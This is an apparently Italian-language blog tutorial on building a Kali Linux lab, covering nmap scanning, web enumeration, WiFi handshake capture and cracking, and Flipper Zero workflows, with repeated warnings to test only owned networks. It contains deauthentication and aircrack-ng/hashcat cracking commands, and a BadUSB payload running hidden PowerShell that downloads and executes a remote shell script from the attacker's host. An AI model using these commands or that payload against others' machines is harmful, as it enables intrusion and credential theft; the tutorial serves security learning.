Menu
Home Articoli {{t.nav.bookmarks}} {{t.nav.experience}} {{t.nav.profiles}} Chi sono Lavora con me
Linux terminal with code
Sicurezza Mar 7, 2026 • 25 min di lettura

Kali Linux Fundamentals: Build Your Hacking Laboratory

Set up Kali Linux, master nmap reconnaissance, capture WiFi handshakes with aircrack-ng, and connect your Flipper Zero to professional penetration testing workflows.

Condividi:
Lee Foropoulos

Lee Foropoulos

25 min di lettura

Continue where you left off?
Text size:

Contents

Il Percorso dell'Hacker: Serie in 5 Parti

Parte 1: IntroduzioneParte 2: Padronanza del FlipperParte 3: Fondamenti di KaliParte 4: ExploitationParte 5: L'Audit Completo

Nelle Parti 1 e 2, hai clonato carte, analizzato frequenze radio e capito perche la maggior parte della "sicurezza" e solo apparenza. Hai visto le vulnerabilita dall'esterno. Ora entri dentro e le vedi dalla prospettiva dell'attaccante.

Kali Linux e la distribuzione standard del settore per il penetration testing. Viene precaricata con oltre 600 strumenti di sicurezza. Questo puo sembrare travolgente. La maggior parte dei tutorial ti butta in acqua profonda con comandi che non capisci e senza contesto sul perche siano importanti.

Noi facciamo le cose diversamente. Alla fine di questo articolo, avrai un laboratorio funzionante, comprenderai la ricognizione di rete a livello fondamentale e catturerai il tuo primo WiFi handshake. Ogni passo si costruisce sul precedente.

La maggior parte dei tutorial ti butta in acqua profonda con comandi che non capisci e senza contesto sul perche siano importanti. Ogni passo qui si costruisce sul precedente.

Parte 1: Costruire il Tuo Laboratorio

I penetration tester professionisti non eseguono Kali sulla loro macchina principale. Usano ambienti isolati che possono essere resettati, salvati come snapshot e distrutti senza influenzare il sistema primario. Farai lo stesso.

Opzione A: Macchina Virtuale (Consigliata per l'Apprendimento)

Una macchina virtuale ti offre l'ambiente di apprendimento piu sicuro. Puoi salvare snapshot dei tuoi progressi, fare errori e tornare indietro istantaneamente.

Cosa Ti Servira

  • Macchina host: 16GB+ RAM, 50GB+ spazio disco libero, CPU moderna con supporto alla virtualizzazione
  • Software di virtualizzazione: VirtualBox (gratuito) o VMware Workstation Player (gratuito per uso personale)
  • Kali Linux: VM pre-costruita ufficiale da kali.org

Progetto: Setup della Kali VM

Tempo: 30-45 minuti

Passaggi:

  1. Scarica l'immagine VM di Kali per il tuo hypervisor (VirtualBox o VMware)
  2. Estrai l'archivio scaricato (7-Zip consigliato per Windows)
  3. Importa la VM nel tuo hypervisor
  4. Configura le risorse: minimo 4GB RAM (8GB consigliati), 2+ core CPU
  5. Abilita l'adattatore di rete in modalita "Bridged" per accesso completo alla rete
  6. Avvia la VM e accedi con le credenziali predefinite: kali / kali
  7. Apri il terminale ed esegui: sudo apt update && sudo apt full-upgrade -y
  8. Crea uno snapshot chiamato "Fresh Install" per un facile ripristino

Verifica: Puoi aprire un terminale, eseguire whoami e vedere kali.

Opzione B: Hardware Dedicato (Per Pratica Seria)

Una volta che sei a tuo agio con Kali, l'hardware dedicato elimina l'overhead della VM e abilita l'accesso completo all'hardware, essenziale per i test wireless.

Consigli sull'Hardware

Opzione economicaThinkPad X230/T430 usato ($100-150), WiFi Intel sostituito con Atheros AR9285
Opzione modernaFramework Laptop con modulo WiFi compatibile Linux
Sensore dedicatoRaspberry Pi 5 4GB con adattatore esterno Alfa AWUS036ACH

Per ora, una VM e perfetta. L'hardware dedicato diventa importante quando hai bisogno della modalita monitor per i test wireless (trattata piu avanti in questo articolo).

Opzione C: Live USB (Zero Persistenza)

Una Live USB esegue Kali direttamente senza installazione. Tutto scompare quando spegni. Utile per testare su hardware diverso, ma perderai il tuo lavoro ad ogni sessione a meno che non crei una partizione persistente.

bash
1# Create bootable USB on Linux/Mac
2sudo dd if=kali-linux-*.iso of=/dev/sdX bs=4M status=progress
3# Replace sdX with your USB device (check with 'lsblk')
4# On Windows: Use Rufus or balenaEtcher

dd Distrugge i Dati

Il comando dd scrive direttamente sul disco senza conferma. Controlla tre volte il nome del dispositivo. Scrivere sul dispositivo sbagliato cancellera completamente quel drive.

Kali Linux terminal with security tools running
Un ambiente Kali Linux configurato correttamente e la base di ogni penetration test professionale.

Parte 2: La Mentalita del Terminale

Prima di toccare strumenti di sicurezza, devi sentirti a tuo agio nel terminale. Non e opzionale. La GUI esiste in Kali, ma il vero lavoro si fa sulla riga di comando.

bash
1# Know where you are
2pwd                    # Print working directory
3
4# Move around
5cd /home/kali          # Go to home directory
6cd ..                  # Go up one level
7cd -                   # Go to previous directory
8
9# See what's here
10ls                     # List files
11ls -la                 # List all files with details
12ls -lah                # Human-readable sizes
13
14# Read files
15cat filename           # Display entire file
16less filename          # Scrollable view (q to quit)
17head -n 20 filename    # First 20 lines
18tail -f filename       # Follow file in real-time (logs)

Escalation dei Privilegi

Molti strumenti di sicurezza richiedono accesso root. In Kali, sudo ti da privilegi root temporanei.

bash
1sudo command           # Run single command as root
2sudo -i                # Start root shell (be careful)
3whoami                 # Check current user
4id                     # Show user and group IDs

Root con Responsabilita

Eseguire come root significa nessuna rete di sicurezza. Un errore di battitura come rm -rf / distruggera tutto. Il Kali moderno impedisce questo specifico comando, ma il principio vale: capisci cosa stai eseguendo prima di eseguirlo.

Gestione dei Processi

bash
1ps aux                 # All running processes
2top                    # Real-time process viewer
3htop                   # Better process viewer (install if needed)
4
5# Control processes
6ctrl+c                 # Stop current process
7ctrl+z                 # Suspend process
8bg                     # Resume in background
9fg                     # Bring to foreground
10
11# Kill processes
12kill PID               # Graceful termination
13kill -9 PID            # Force kill (last resort)

Comandi di Rete

bash
1ip a                   # Show network interfaces
2ip route               # Show routing table
3ping -c 4 8.8.8.8     # Test connectivity
4curl ifconfig.me       # Your public IP
5
6# DNS lookups
7nslookup google.com
8dig google.com

Progetto: Orientamento al Terminale

Tempo: 15 minuti

Compiti:

  1. Trova il tuo indirizzo IP sulla rete locale usando ip a
  2. Identifica il tuo gateway predefinito usando ip route
  3. Fai un ping al tuo gateway per confermare la connettivita
  4. Elenca tutti i file in /etc ordinati per tempo di modifica: ls -lt /etc | head
  5. Leggi le prime 50 righe di /etc/passwd: head -n 50 /etc/passwd

Obiettivo: Dovresti essere in grado di navigare, controllare lo stato della rete e leggere file senza pensarci.

Parte 3: Ricognizione di Rete con Nmap

Nmap (Network Mapper) e lo strumento piu importante che imparerai. Scopre host, identifica servizi, rileva sistemi operativi e mappa la topologia di rete. Tutto il resto si costruisce sull'output di nmap.

La Tua Prima Scansione

Scansioniamo la tua rete. Prima, identifica il range della tua rete:

bash
1# Find your local IP and subnet
2ip a | grep inet
3# Look for something like: inet 192.168.1.100/24
4# The /24 means your network is 192.168.1.0-255
bash
1# Basic discovery scan (your network only)
2sudo nmap -sn 192.168.1.0/24
3
4# What this does:
5# -sn = ping scan (no port scanning, just host discovery)
6# /24 = scan all 256 addresses in this subnet

Vedrai un output come questo:

text
1Nmap scan report for 192.168.1.1
2Host is up (0.0025s latency).
3MAC Address: AA:BB:CC:DD:EE:FF (Manufacturer Name)
4
5Nmap scan report for 192.168.1.50
6Host is up (0.0042s latency).
7MAC Address: 11:22:33:44:55:66 (Another Manufacturer)

Quella prima scansione ti dice: "Questi dispositivi esistono sulla mia rete." Ora facciamo domande piu profonde.

Rilevamento dei Servizi

Una volta che sai quali host esistono, vuoi sapere quali servizi stanno eseguendo.

bash
1# Scan a single target for open ports and services
2sudo nmap -sV 192.168.1.1
3# -sV = Version detection (probe open ports for service info)

Output tipico:

text
1PORT     STATE SERVICE  VERSION
222/tcp   open  ssh      OpenSSH 8.4p1
380/tcp   open  http     nginx 1.18.0
4443/tcp  open  ssl/http nginx 1.18.0

Rilevamento del Sistema Operativo

bash
1# Detect OS (requires root)
2sudo nmap -O 192.168.1.1
3
4# Combined scan: OS detection + service versions + default scripts
5sudo nmap -A 192.168.1.1

Capire gli Stati delle Porte

Nmap riporta le porte in diversi stati:

  • open - Applicazione che accetta attivamente connessioni. Questo e cio che cercano gli attaccanti.
  • closed - Porta accessibile ma nessuna applicazione in ascolto. L'host e attivo ma non c'e niente li.
  • filtered - Firewall o filtro che blocca la sonda. Non si puo determinare se aperta o chiusa.
  • unfiltered - Porta accessibile ma nmap non riesce a determinare se aperta o chiusa.

Tipi di Scansione e Stealth

bash
1# TCP Connect scan (default, noisy but reliable)
2sudo nmap -sT target
3
4# SYN scan (stealthier, default with root)
5sudo nmap -sS target
6
7# UDP scan (slow but important - many services use UDP)
8sudo nmap -sU target
9
10# Scan all 65535 ports (thorough but slow)
11sudo nmap -p- target
12
13# Scan specific ports
14sudo nmap -p 22,80,443,8080 target
15
16# Top 1000 common ports (default behavior)
17sudo nmap target

Nmap Scripting Engine (NSE)

NSE estende nmap con script specializzati per il rilevamento di vulnerabilita, l'enumerazione dei servizi e molto altro.

bash
1# Run default safe scripts
2sudo nmap -sC target
3
4# Check for vulnerabilities
5sudo nmap --script vuln target
6
7# SMB enumeration (Windows shares)
8sudo nmap --script smb-enum-shares target
9
10# HTTP enumeration
11sudo nmap --script http-enum target
12
13# List available scripts
14ls /usr/share/nmap/scripts/ | head -20

Progetto: Mappa la Tua Rete

Tempo: 30 minuti

Prerequisiti: Conosci il range della tua rete da ip a

  1. Scopri tutti gli host: sudo nmap -sn YOUR_NETWORK/24
  2. Elenca gli host scoperti e i loro indirizzi MAC
  3. Scegli il tuo router (di solito .1) ed esegui: sudo nmap -sV -sC YOUR_ROUTER
  4. Identifica tutte le porte aperte e i servizi sul tuo router
  5. Esegui sudo nmap -A YOUR_COMPUTER per vedere cosa espone la tua macchina

Documenta: Crea un file di testo che elenca ogni dispositivo, il suo IP, MAC e servizi. Questa e la tua mappa di rete.

Scansiona Solo Reti di Tua Proprieta

Scansionare reti senza autorizzazione e illegale nella maggior parte delle giurisdizioni. Anche una semplice scansione nmap puo essere considerata accesso non autorizzato. Resta sulla tua rete, le tue apparecchiature e reti dove hai esplicita autorizzazione scritta.

Parte 4: Ricognizione Web

La tua scansione nmap ha probabilmente trovato servizi HTTP (porte 80, 443, 8080). Capiamo cosa sta girando li.

Whatweb: Identificazione Rapida del Servizio

bash
# Identify web technologies
whatweb http://192.168.1.1

Esempio di output:

text
1http://192.168.1.1 [200 OK] Country[RESERVED][ZZ],
2HTTPServer[nginx/1.18.0], IP[192.168.1.1],
3Title[Router Admin], nginx[1.18.0]

Nikto: Scanner di Vulnerabilita Web

bash
1# Scan for common web vulnerabilities
2nikto -h http://192.168.1.1
3
4# This checks for:
5# - Outdated server software
6# - Dangerous files/CGIs
7# - Misconfigurations
8# - Default credentials

Enumerazione delle Directory: Cosa e Nascosto?

I web server spesso hanno directory non collegate dalla pagina principale: pannelli di amministrazione, file di configurazione, file di backup.

bash
# Gobuster: directory brute-forcing
gobuster dir -u http://192.168.1.1 -w /usr/share/wordlists/dirb/common.txt

Scoperte comuni:

text
1/admin   (Status: 301)
2/backup  (Status: 403)
3/config  (Status: 200)
4/login   (Status: 200)

Posizione delle Wordlist

Kali include wordlist estese in /usr/share/wordlists/. Le directory piu comuni: dirb/, dirbuster/, rockyou.txt (password) e seclists/ (collezione completa).

Progetto: Verifica l'Interfaccia Web del Tuo Router

Tempo: 20 minuti

  1. Esegui whatweb http://YOUR_ROUTER_IP per identificare il server
  2. Esegui nikto -h http://YOUR_ROUTER_IP per verificare vulnerabilita
  3. Esegui gobuster dir -u http://YOUR_ROUTER_IP -w /usr/share/wordlists/dirb/small.txt
  4. Visita le directory scoperte in un browser
  5. Annota pannelli di amministrazione, numeri di versione o scoperte interessanti

Scoperta comune: Pagine di amministrazione del router esposte con credenziali predefinite.

Server room with network infrastructure
La ricognizione di rete rivela la topologia completa dell'ambiente target, dai router ai servizi nascosti.

Parte 5: Ricognizione Wireless

Qui le cose si fanno interessanti. Le reti WiFi trasmettono costantemente, e con gli strumenti giusti, puoi catturare handshake di autenticazione: lo scambio crittografato che avviene quando un dispositivo si connette.

Requisiti Hardware

Il tuo WiFi integrato probabilmente non funzionera per questo. Hai bisogno di un adattatore che supporti la modalita monitor e la packet injection. Consigliati: Alfa AWUS036ACH ($50) o Alfa AWUS036ACM ($45). Funzionano subito con Kali.

Capire la Modalita Monitor

La modalita WiFi normale ("managed mode") riceve solo i pacchetti indirizzati al tuo dispositivo. La modalita monitor cattura tutti i pacchetti nel raggio d'azione, il traffico di ogni dispositivo sul canale.

bash
1# Check your wireless interfaces
2iwconfig
3# Look for your adapter (often wlan0 or wlan1)
4
5# Kill interfering processes
6sudo airmon-ng check kill
7
8# Enable monitor mode
9sudo airmon-ng start wlan0
10# Your interface is now wlan0mon

Scansione delle Reti

bash
1# Start capturing wireless traffic
2sudo airodump-ng wlan0mon
3
4# You'll see:
5# BSSID  = Router MAC address
6# PWR    = Signal strength (higher = closer)
7# CH     = Channel
8# ENC    = Encryption (WPA2, WPA3, OPN)
9# ESSID  = Network name
10
11# Press Ctrl+C to stop

Quello che stai vedendo e ogni rete WiFi nel raggio, le loro impostazioni di sicurezza e spesso i dispositivi connessi. Questo e cio che vede un war driver quando scansiona i quartieri.

Cattura dell'Handshake

Quando un dispositivo si connette a una rete WPA2, c'e un four-way handshake. Se catturi questo handshake, puoi tentare di craccare la password offline.

bash
1# Focus on your target network (your own network!)
2sudo airodump-ng -c CHANNEL --bssid ROUTER_MAC -w capture wlan0mon
3# -c CHANNEL = Target's channel from previous scan
4# --bssid = Target router's MAC address
5# -w capture = Save to files starting with "capture"
6
7# Now wait for a device to connect...
8
9# Or force a reconnection (on YOUR network only):
10# In a new terminal:
11sudo aireplay-ng --deauth 5 -a ROUTER_MAC wlan0mon
12# This sends 5 deauth packets, disconnecting clients
13# They automatically reconnect, generating a handshake

Quando catturi un handshake, airodump-ng mostra [ WPA handshake: XX:XX:XX:XX:XX:XX ] nell'angolo in alto a destra.

Gli Attacchi Deauth Sono Illegali

Inviare pacchetti di deautenticazione a reti che non possiedi e un reato federale ai sensi del Computer Fraud and Abuse Act (negli USA) e leggi simili altrove. Testa solo sulla tua rete. L'obiettivo e capire la vulnerabilita, non attaccare altri.

Cracking dell'Handshake

Con un handshake catturato, puoi tentare di craccare la password offline usando una wordlist:

bash
1# Crack using a wordlist
2aircrack-ng -w /usr/share/wordlists/rockyou.txt capture-01.cap
3
4# If the password is in the wordlist, you'll see:
5# KEY FOUND! [ password123 ]
6
7# For stronger passwords, use hashcat (GPU-accelerated)
8# First, convert capture format:
9cap2hccapx capture-01.cap capture.hccapx
10
11# Then crack with hashcat:
12hashcat -m 22000 capture.hccapx /usr/share/wordlists/rockyou.txt
14M+
Password reali da vere violazioni di dati sono incluse in rockyou.txt, la wordlist predefinita usata per craccare i WiFi handshake catturati.

Verifica della Robustezza delle Password

rockyou.txt contiene 14+ milioni di password da vere violazioni di dati. Se la tua password WiFi e "password123" o "summer2024" o il nome del tuo cane, e craccabile in secondi. Una password casuale di 12+ caratteri richiederebbe milioni di anni per un brute-force.

Progetto: Testa la Sicurezza del Tuo WiFi

Tempo: 45 minuti

Prerequisiti: Adattatore WiFi esterno con supporto modalita monitor

  1. Abilita la modalita monitor: sudo airmon-ng start wlan0
  2. Scansiona le reti: sudo airodump-ng wlan0mon
  3. Annota il canale e il BSSID della tua rete
  4. Cattura sul tuo canale: sudo airodump-ng -c CHANNEL --bssid YOUR_BSSID -w mywifi wlan0mon
  5. Riconnetti un dispositivo al tuo WiFi (o usa deauth sulla TUA rete)
  6. Conferma la cattura dell'handshake
  7. Testa contro rockyou.txt: aircrack-ng -w /usr/share/wordlists/rockyou.txt mywifi-01.cap

Risultato: Se la tua password e stata trovata, cambiala immediatamente con qualcosa di casuale e lungo (20+ caratteri).

Parte 6: Collegare il Tuo Flipper Zero

Ricordi tutte quelle catture dalla Parte 2? Integriamole nel tuo workflow con Kali.

Trasferimento File

bash
1# Connect Flipper via USB
2# It appears as a mass storage device
3
4# Mount if not auto-mounted
5sudo mount /dev/sda1 /mnt/flipper
6
7# Your captures are in:
8/mnt/flipper/subghz/       # Sub-GHz captures
9/mnt/flipper/nfc/          # NFC dumps
10/mnt/flipper/infrared/     # IR captures
11/mnt/flipper/lfrfid/       # 125kHz RFID
12/mnt/flipper/badusb/       # BadUSB scripts

Analisi dei Dump NFC

bash
1# Install libnfc tools
2sudo apt install libnfc-bin mfoc mfcuk
3
4# Flipper saves NFC as .nfc text format
5# Convert to binary for analysis:
6python3 flipper_nfc_to_mfd.py card.nfc card.mfd
7
8# Analyze MIFARE Classic dump
9hexdump -C card.mfd | less

Analisi Sub-GHz

bash
1# Flipper's .sub files are text-based
2cat garage_door.sub
3
4# Contains:
5# - Frequency (315MHz, 433MHz, etc.)
6# - Protocol or RAW data
7# - Timing information
8
9# For deeper RF analysis, use:
10# - Universal Radio Hacker (URH)
11# - GNU Radio
12# - rtl_433 (with SDR hardware)

Sviluppo BadUSB

Crea payload BadUSB in Kali, testali sul Flipper:

bash
1# Flipper uses DuckyScript-compatible syntax
2# Create payload on Kali:
3cat > kali_connect.txt << 'EOF'
4DELAY 1000
5GUI r
6DELAY 500
7STRING powershell -nop -w hidden -c "IEX(New-Object Net.WebClient).DownloadString('http://YOUR_KALI_IP:8000/shell.ps1')"
8ENTER
9EOF
10
11# Host the payload from Kali:
12python3 -m http.server 8000
13
14# Copy to Flipper's badusb folder
15cp kali_connect.txt /mnt/flipper/badusb/

I Payload BadUSB Sono Potenti

Questi script si eseguono automaticamente quando vengono collegati. Un payload malevolo potrebbe installare backdoor, rubare credenziali o distruggere dati in secondi. Usa solo sulle tue macchine per testing. Non lasciare mai il tuo Flipper dove qualcun altro potrebbe collegarlo.

Parte 7: Documentazione e Workflow

I penetration tester professionisti non eseguono solo strumenti. Documentano tutto. Una buona documentazione separa i dilettanti dai professionisti.

Presa di Note con CherryTree

bash
1# Install CherryTree (hierarchical note-taking)
2sudo apt install cherrytree
3
4# Organize notes by:
5# - Target/network
6# - Reconnaissance
7# - Enumeration
8# - Vulnerabilities
9# - Exploitation attempts
10# - Post-exploitation

Salvare l'Output di Nmap

bash
1# Save in all formats
2sudo nmap -sV -sC -oA scan_results target
3
4# Creates:
5# scan_results.nmap (human-readable)
6# scan_results.xml  (parseable)
7# scan_results.gnmap (greppable)

Logging della Sessione

bash
1# Log entire terminal session
2script session_$(date +%Y%m%d_%H%M%S).log
3
4# Now every command and output is recorded
5# Type 'exit' to stop logging

Il Percorso dell'Hacker

Una serie in 5 parti che ti porta da curioso a capace.

Parte 1: Introduzione Parte 2: Padronanza del Flipper Parte 3: Fondamenti di Kali ✓ Parte 4: Exploitation Parte 5: Audit Completo

Checklist della Parte 3

☐ Setup del Lab: Kali VM in esecuzione, aggiornata, snapshot salvato

☐ Terminale: A proprio agio con navigazione, permessi, controllo processi

☐ Nmap: Rete mappata, servizi identificati, router scansionato

☐ Ricognizione Web: Interfaccia web del router analizzata con whatweb/nikto

☐ Wireless: Modalita monitor abilitata, reti scansionate

☐ Handshake: Handshake WiFi personale catturato e testato

☐ Flipper: File trasferiti, workflow compreso

☐ Documentazione: Note organizzate, scansioni salvate

Piano d'Azione Fondamenti di Kali 0/6

Cosa Viene Dopo

Hai costruito il tuo laboratorio e imparato la fase di ricognizione. Puoi scoprire host, identificare servizi e catturare handshake wireless. Capisci cosa vedono gli attaccanti quando guardano una rete.

Nella Parte 4, passiamo dalla ricognizione all'exploitation. Imparerai:

  • Metasploit Framework, il coltellino svizzero dell'exploitation
  • Workflow comuni di exploitation delle vulnerabilita
  • Tecniche di post-exploitation: cosa succede dopo l'accesso iniziale
  • Escalation dei privilegi: da utente normale ad amministratore
  • Pivoting: usare un sistema compromesso per attaccarne altri

La ricognizione ti dice dove sono le porte. L'exploitation ti insegna come attraversarle.

Hai mappato il territorio. Ora impari a navigarlo. La Parte 4 ti porta da osservatore a operatore.

Ci vediamo nella Parte 4.

How was this article?

Condividi

Link copied to clipboard!

You Might Also Like

Lee Foropoulos

Lee Foropoulos

Business Development Lead at Lookatmedia, fractional executive, and founder of gotHABITS.

🔔

Non perdere nessun articolo

Ricevi una notifica quando vengono pubblicati nuovi articoli. Nessuna email richiesta.

Vedrai un banner sul sito quando viene pubblicato un nuovo articolo, oltre a una notifica del browser se lo consenti.

Solo notifiche del browser. Niente spam, niente email.

0 / 0